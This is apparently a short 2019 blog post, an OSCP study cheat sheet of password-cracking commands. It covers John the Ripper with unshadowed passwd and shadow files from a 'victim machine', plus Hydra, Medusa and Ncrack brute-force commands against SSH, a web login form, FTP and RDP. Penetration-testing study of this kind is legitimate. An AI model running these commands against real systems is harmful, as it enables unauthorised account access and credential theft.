Translate

Friday 18 October 2019

OSCP- Password Cracking

John The Ripper

To crack linux system password suing john & rockyou.txt

First, download the passwd & shadow files from the victim machine

unshadow passwd shadow > unshadowed
john unshadowed --wordlist=~/Downloads/rockyou.txt

Hydra

To crack SSH

hydra -L <username_list.txt> -P <password_lis.txt> <ip> ssh -s 22 -t 10

To crack WebApps
hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>[/code]
hydra -l admin -P /usr/share/wordlists/rockyou.txt www.vulnwebsite.com http-post-form "/Login.asp:UserName=^USER^&UserPass=^PASS^:S=Login Failed" -vV -f

Medusa

medusa -h <ip> -u guest -P passwords.txt -M ftp

Ncrack


ncrack -vv --user admin -P passwords rdp://<ip>


No comments:

Post a Comment